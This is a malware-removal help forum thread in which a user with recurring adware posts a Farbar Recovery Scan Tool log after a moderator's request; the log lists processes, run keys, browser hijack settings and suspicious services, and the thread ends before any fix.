Slow Laptop after a day of running

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • herrick
    PCHF Member
    • Mar 2017
    • 55

    #1

    Slow Laptop after a day of running

    Hi, so I have an issue with slow laptop. I ran zemana and found ghokswa or something and deleted it.
    But after a few days laptop started running slow again if I let it on for a day or two.
    When I scanned it with zemana earlier, I found ghokswa again.
    I am not sure where this is coming from, and on top of that I have Social2Search that I couldnt uninstal from my laptop.
    So I search on google about ghokswa and found this thread https://pchelpforum.net/t/laptop-is-...-slowly.14652/ .
    I hope someone can guide me to clean my laptop T_T
  • Malnutrition
    PCHF Moderator
    • Jul 2016
    • 7045

    #2
    Welcome to PCHF

    Please run Farbar Recovery Scan Tool to give me a fresh look at your system.

    Please download the FRST 32 bit or FRST 64bit version to suit your operating system. It is important FRST is downloaded to your desktop.

    If you are unsure if your operating system is 32 or 64 Bit please go HERE.

    [ul]
    [li]Right-click on FRST icon and select Run as Administrator to start the tool.[/li](XP users click run after receipt of Windows Security Warning - Open File).
    [li]Make sure that Addition option is checked, as well as Shortcut.txt[/li][li]Press Scan button and wait.[/li][li]The tool will produce three logfiles on your desktop: FRST.txt, and Addition.txt – & Shortcut.txt[/li][/ul]
    Please Copy & Paste them into your next reply. But attach Shortcut.txt

    Comment

    • herrick
      PCHF Member
      • Mar 2017
      • 55

      #3
      sry but which one is the attach txt? or i can jst paste all of them?

      Comment

      • herrick
        PCHF Member
        • Mar 2017
        • 55

        #4
        Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 15-03-2017
        Ran by ASUS (administrator) on MAMBA (01-04-2017 00:15:23)
        Running from C:\Users\ASUS\Desktop
        Loaded Profiles: ASUS (Available Profiles: defaultuser0 & ASUS)
        Platform: Windows 10 Enterprise Version 1607 (X64) Language: English (United Kingdom)
        Internet Explorer Version 11 (Default browser: Edge)
        Boot Mode: Normal
        Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

        ==================== Processes (Whitelisted) =================

        (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

        (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Containe r.exe
        (Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igd lh64.inf_amd64_463164d40c3d26ce\igfxCUIService.exe
        (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
        (Windows (R) Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
        (Dropbox, Inc.) C:\Windows\System32\DbxSvc.exe
        (Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
        (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
        (Intel Corporation) C:\Windows\System32\Intel\DPTF\esif_uf.exe
        (Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
        (Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igd lh64.inf_amd64_463164d40c3d26ce\IntelCpHDCPSvc.exe
        (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgwdsvca.exe
        (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
        (Conexant Systems, Inc.) C:\Windows\System32\SASrv.exe
        (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgidsagenta.exe
        (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
        (Razer Inc.) D:\Program Files (x86)\Razer\Razer Cortex\RzKLService.exe
        (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgcsrva.exe
        (Intel Corporation) C:\Windows\Temp\DPTF\esif_assist_64.exe
        (NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
        (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\Pres entationFontCache.exe
        (NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvContainer\nvcontainer.exe
        (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgnsa.exe
        (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgemca.exe
        (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgrsa.exe
        (Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\igd lh64.inf_amd64_463164d40c3d26ce\igfxEM.exe
        (Dropbox, Inc.) C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
        (ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\ASUS Touchpad Handwriting\Exe\x64\AsusHWCenter64.exe
        (Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\CAudioFilterAgent 64.exe
        (© 2015 Microsoft Corporation) C:\Users\ASUS\AppData\Local\Microsoft\BingSvc\Bing Svc.exe
        (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
        (AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Av\avgui.exe
        (Conexant Systems, Inc) C:\Program Files\CONEXANT\SAII\SmartAudio.exe
        (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
        (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
        (Node.js) C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVIDIA Web Helper.exe
        () D:\Bots\openkore-master\wxstart.exe
        () D:\Bots\Vend Oridecon\wxstart.exe
        (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe
        (Microsoft Corporation) C:\Windows\System32\dllhost.exe
        (Spotify Ltd) C:\Users\ASUS\AppData\Roaming\Spotify\SpotifyWebHe lper.exe
        (Copyright 2017.) D:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
        (Copyright 2017.) D:\Program Files (x86)\Zemana AntiMalware\ZAM.exe
        (Microsoft Corporation) C:\Windows\System32\dllhost.exe
        (BattlePing) D:\Program Files (x86)\BattlePing\BattlePing.exe
        (www.networktunnel.net) D:\Program Files (x86)\BattlePing\bp\ss5capengine_battleping.exe
        () D:\Program Files (x86)\BattlePing\bp\networktunnelx64helper.exe
        () D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Ragexe.exe
        (Microsoft Corporation) C:\Windows\System32\GameBarPresenceWriter.exe
        (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
        (Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
        () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.12.112.0_x 64__kzf8qxf38zg5c\SkypeHost.exe
        (Skype Technologies) C:\Program Files (x86)\Skype\Browser\SkypeBrowserHost.exe
        (Microsoft Corporation) C:\Windows\System32\smartscreen.exe
        (Microsoft Corporation) C:\Program Files\Microsoft Office\root\Office16\msoia.exe
        (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
        (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

        ==================== Registry (Whitelisted) ====================

        (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

        HKLM...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent 64.exe [599896 2015-06-10] (Conexant Systems, Inc.)
        HKLM...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SACpl.exe [1830232 2016-03-08] (Conexant Systems, Inc.)
        HKLM...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.e xe [446392 2012-04-04] (Adobe Systems Incorporated)
        HKLM...\Run: [ShadowPlay] => “C:\Windows\system32\rundll32.exe” C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSyst emStart
        HKLM...\Run: [ZAM] => D:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14471408 2017-03-06] (Copyright 2017.)
        HKLM-x32...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [926896 2012-09-23] (Adobe Systems Incorporated)
        HKLM-x32...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.ex e [1073312 2012-03-09] (Adobe Systems Incorporated)
        HKLM-x32...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [240400 2016-12-06] (AVG Technologies CZ, s.r.o.)
        HKLM-x32...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe [240400 2016-12-06] (AVG Technologies CZ, s.r.o.)
        HKLM-x32...\Run: =>
        HKLM-x32...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [596640 2017-01-16] (Razer Inc.)
        HKLM-x32...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [28065728 2017-03-22] (Dropbox, Inc.)
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Run: [AdobeBridge] =>
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27427808 2017-02-08] (Skype Technologies S.A.)
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Run: [BingSvc] => C:\Users\ASUS\AppData\Local\Microsoft\BingSvc\Bing Svc.exe [144008 2015-11-05] (© 2015 Microsoft Corporation)
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Run: [Spotify Web Helper] => C:\Users\ASUS\AppData\Roaming\Spotify\SpotifyWebHe lper.exe [1446000 2017-03-31] (Spotify Ltd)
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Run: [Spotify] => C:\Users\ASUS\AppData\Roaming\Spotify\Spotify.exe [7089776 2017-03-31] (Spotify Ltd)
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Run: [PPBFY9hyTL.exe] => C:\Program Files\NVIDIA Corporation{7c8-c9-af-b34d9-b8be3-78d8-a8b10}\PPBFY9hyTL.exe -r1_1 -r2_1
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\Run: [CCleaner] => C:\Program Files\CCleaner\CCleaner64.exe [9363672 2017-02-08] (Piriform Ltd)
        HKLM...\Providers\eiwhng8h: C:\Program Files (x86)\Thoveent Engine\local64spl.dll
        ShellIconOverlayIdentifiers: [ DropboxExt01] → {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers: [ DropboxExt02] → {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers: [ DropboxExt03] → {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers: [ DropboxExt04] → {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers: [ DropboxExt05] → {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers: [ DropboxExt06] → {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers: [ DropboxExt07] → {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers: [ DropboxExt08] → {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers: [ DropboxExt09] → {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers: [ DropboxExt10] → {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers-x32: [ DropboxExt01] → {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers-x32: [ DropboxExt02] → {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers-x32: [ DropboxExt03] → {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers-x32: [ DropboxExt04] → {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers-x32: [ DropboxExt05] → {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers-x32: [ DropboxExt06] → {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers-x32: [ DropboxExt07] → {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers-x32: [ DropboxExt08] → {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers-x32: [ DropboxExt09] → {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-03-22] (Dropbox, Inc.)
        ShellIconOverlayIdentifiers-x32: [ DropboxExt10] → {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.15.0.dll [2017-03-22] (Dropbox, Inc.)

        ==================== Internet (Whitelisted) ====================

        (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

        Winsock: Catalog9 01 C:\Windows\SysWOW64\networkdlllsp.dll [448296 2016-10-16] (Network Tunnel Lab)
        Winsock: Catalog9 02 C:\Windows\SysWOW64\networkdlllsp.dll [448296 2016-10-16] (Network Tunnel Lab)
        Winsock: Catalog9 03 C:\Windows\SysWOW64\networkdlllsp.dll [448296 2016-10-16] (Network Tunnel Lab)
        Winsock: Catalog9 04 C:\Windows\SysWOW64\networkdlllsp.dll [448296 2016-10-16] (Network Tunnel Lab)
        Winsock: Catalog9 05 C:\Windows\SysWOW64\networkdlllsp.dll [448296 2016-10-16] (Network Tunnel Lab)
        Winsock: Catalog9 06 C:\Windows\SysWOW64\networkdlllsp.dll [448296 2016-10-16] (Network Tunnel Lab)
        Winsock: Catalog9 07 C:\Windows\SysWOW64\networkdlllsp.dll [448296 2016-10-16] (Network Tunnel Lab)
        Tcpip\Parameters: [DhcpNameServer] 192.168.111.1
        Tcpip..\Interfaces{f4d23fd5-4b64-4c07-bed9-ba46ecaf0037}: [NameServer] 8.8.8.8,8.8.4.4
        Tcpip..\Interfaces{f4d23fd5-4b64-4c07-bed9-ba46ecaf0037}: [DhcpNameServer] 192.168.111.1
        [HEADING=1]Internet Explorer:[/HEADING]
        HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
        HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1489487534&z=8f8c54b40a0e703f2b251d5g3 zbbbtbzeb8m1w0c8m&from=che0812&uid=HGSTXHTS541010A 9E680_JD1008DM20840W20840WX
        HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
        HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1487663291&z=b41367c29dd1525fd732f00g6 zeb1m2qfqec0odt6o&from=che0812&uid=HGSTXHTS541010A 9E680_JD1008DM20840W20840WX&q={searchTerms}
        HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
        HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1489487534&z=8f8c54b40a0e703f2b251d5g3 zbbbtbzeb8m1w0c8m&from=che0812&uid=HGSTXHTS541010A 9E680_JD1008DM20840W20840WX
        HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
        HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1487663291&z=b41367c29dd1525fd732f00g6 zeb1m2qfqec0odt6o&from=che0812&uid=HGSTXHTS541010A 9E680_JD1008DM20840W20840WX&q={searchTerms}
        SearchScopes: HKLM → DefaultScope value is missing
        SearchScopes: HKLM → {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
        SearchScopes: HKLM-x32 → DefaultScope {ielnksrch} URL =
        SearchScopes: HKLM-x32 → ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBFnYN5R-SRTQR4zPSPmlMHrD_xlOeu95O0THUbBGqXOZYiJqh9rdyQRqZi 95INKcagYek6XEcaeXeCQH6nCtl08-tJY-msx_wiZn0BwWhNvPh6hbwd0j-JBuWgd928ntQba5oZQQYTZWVPMNJfQN7n7XKwDKWAPdYWK5FLu oP_3gQJ_RiDsOyIRTq0&q={searchTerms}
        SearchScopes: HKLM-x32 → {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1487663291&z=b41367c29dd1525fd732f00g6 zeb1m2qfqec0odt6o&from=che0812&uid=HGSTXHTS541010A 9E680_JD1008DM20840W20840WX&q={searchTerms}
        SearchScopes: HKU\S-1-5-21-2746278279-2939389576-4119914495-1001 → {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
        SearchScopes: HKU\S-1-5-21-2746278279-2939389576-4119914495-1001 → {ielnksrch} URL =
        BHO-x32: Adobe PDF Link Helper → {18DF081C-E8AD-4283-A596-FA578C2EBDC3} → C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
        BHO-x32: Lync Browser Helper → {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} → C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll [2017-02-14] (Microsoft Corporation)
        BHO-x32: Microsoft OneDrive for Business Browser Helper → {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} → C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL [2017-02-14] (Microsoft Corporation)
        Handler: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
        Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
        Handler: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
        Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
        Handler: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
        Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
        Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
        Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL [2017-02-14] (Microsoft Corporation)
        [HEADING=1]Edge:[/HEADING]
        Edge HomeButtonPage: HKU\S-1-5-21-2746278279-2939389576-4119914495-1001 → hxxp://www.google.com
        [HEADING=1]FireFox:[/HEADING]
        FF DefaultProfile: dvwdtm10.default
        FF ProfilePath: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\nawe riweentcofise\Profiles\dvwdtm10.default\Profiles\d vwdtm10.default [not found]
        FF ProfilePath: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Prof iles\dvwdtm10.default [2017-03-31]
        FF NewTab: Mozilla\Firefox\Profiles\dvwdtm10.default → about:newtab
        FF DefaultSearchEngine: Mozilla\Firefox\Profiles\dvwdtm10.default → Bing
        FF SearchEngineOrder.3: Mozilla\Firefox\Profiles\dvwdtm10.default → Bing
        FF SelectedSearchEngine: Mozilla\Firefox\Profiles\dvwdtm10.default → Bing
        FF Homepage: Mozilla\Firefox\Profiles\dvwdtm10.default → about:home
        FF Keyword.URL: Mozilla\Firefox\Profiles\dvwdtm10.default → hxxp://www.bing.com/search?FORM=SK216DF&PC=SK216&q=
        FF Extension: (Bing Search) - C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Prof iles\dvwdtm10.default\Extensions\bingsearch.full@microsoft.com.xpi [2017-02-15]
        FF SearchPlugin: C:\Users\ASUS\AppData\Roaming\Mozilla\Firefox\Prof iles\dvwdtm10.default\searchplugins\bing-.xml [2017-02-15]
        FF Plugin: @adobe.com/FlashPlayer → C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_ 185.dll [2017-02-14] ()
        FF Plugin: @microsoft.com/SharePoint,version=14.0 → C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-02-14] (Microsoft Corporation)
        FF Plugin-x32: @adobe.com/FlashPlayer → C:\Windows\SysWoW64\Macromed\Flash\NPSWF32_23_0_0_ 185.dll [2017-02-14] ()
        FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 → C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL [2017-02-14] (Microsoft Corporation)
        FF Plugin-x32: @tools.google.com/Google Update;version=3 → C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-03-31] (Google Inc.)
        FF Plugin-x32: @tools.google.com/Google Update;version=9 → C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-03-31] (Google Inc.)
        FF Plugin-x32: Adobe Reader → C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2012-09-23] (Adobe Systems Inc.)
        [HEADING=1]Chrome:[/HEADING]
        CHR DefaultProfile: Default
        CHR Profile: C:\Users\ASUS\AppData\Local\Google\Chrome\User Data\Default [2017-04-01]
        HKU\S-1-5-21-2746278279-2939389576-4119914495-1001...\StartMenuInternet\ChromeHTML: → C:\Program Files (x86)\Standuck\Application\chrome.exe <==== ATTENTION

        ==================== Services (Whitelisted) ====================

        (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

        S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [109056 2009-02-06] (ArcSoft Inc.)
        R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [325600 2016-05-20] (Windows (R) Win 7 DDK provider)
        S3 AvgAMPS; C:\Program Files (x86)\AVG\Av\avgamps.exe [1002552 2017-03-23] (AVG Technologies CZ, s.r.o.)
        R2 AVGIDSAgent; C:\Program Files (x86)\AVG\Av\avgidsagenta.exe [5334432 2017-03-23] (AVG Technologies CZ, s.r.o.)
        R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1146128 2016-12-06] (AVG Technologies CZ, s.r.o.)
        R2 avgwd; C:\Program Files (x86)\AVG\Av\avgwdsvca.exe [729048 2017-03-23] (AVG Technologies CZ, s.r.o.)
        R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2838760 2016-04-24] (Microsoft Corporation)
        S3 cphs; C:\Windows\System32\DriverStore\FileRepository\igd lh64.inf_amd64_463164d40c3d26ce\IntelCpHeciSvc.exe [301536 2016-11-30] (Intel Corporation)
        R2 cplspcon; C:\Windows\System32\DriverStore\FileRepository\igd lh64.inf_amd64_463164d40c3d26ce\IntelCpHDCPSvc.exe [480224 2016-11-30] (Intel Corporation)
        S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2017-02-18] (Dropbox, Inc.)
        S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2017-02-18] (Dropbox, Inc.)
        R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [46408 2017-03-11] (Dropbox, Inc.)
        R2 esifsvc; C:\Windows\System32\Intel\DPTF\esif_uf.exe [1585784 2016-05-23] (Intel Corporation)
        S4 hshld; C:\Program Files (x86)\Hotspot Shield\bin\cmw_srv.exe [2604664 2017-03-01] (AnchorFree Inc.)
        R2 igfxCUIService2.0.0.0; C:\Windows\System32\DriverStore\FileRepository\igd lh64.inf_amd64_463164d40c3d26ce\igfxCUIService.exe [341984 2016-11-30] (Intel Corporation)
        S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [974632 2016-02-20] (Intel(R) Corporation)
        R3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2016-03-03] (Intel Corporation) [File not signed]
        S2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [8704 2016-03-03] (Intel Corporation) [File not signed]
        R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [215328 2016-05-17] (Intel Corporation)
        R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-24] (NVIDIA Corporation)
        S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [462784 2017-02-24] (NVIDIA Corporation)
        R2 NVDisplay.ContainerLocalSystem; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Containe r.exe [464440 2017-03-17] (NVIDIA Corporation)
        R2 NvTelemetryContainer; C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [425408 2017-02-24] (NVIDIA Corporation)
        S3 ose64; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [242720 2016-04-23] (Microsoft Corporation) [File not signed]
        S2 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] ()
        R2 RzKLService; D:\Program Files (x86)\Razer\Razer Cortex\RzKLService.exe [133376 2016-09-28] (Razer Inc.)
        R2 SAService; C:\Windows\system32\SAsrv.exe [427224 2015-04-17] (Conexant Systems, Inc.)
        S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2889896 2016-09-16] (Microsoft Corporation)
        S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
        S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103712 2017-03-04] (Microsoft Corporation)
        R2 ZAMSvc; D:\Program Files (x86)\Zemana AntiMalware\ZAM.exe [14471408 2017-03-06] (Copyright 2017.)
        S2 ed2kidle; “C:\Program Files (x86)\amulell\ed2k.exe” -downloadwhenidle
        S2 WINSNARE; C:\Users\ASUS\AppData\Roaming\WINSNARE\WinSnare.dl l <==== ATTENTION

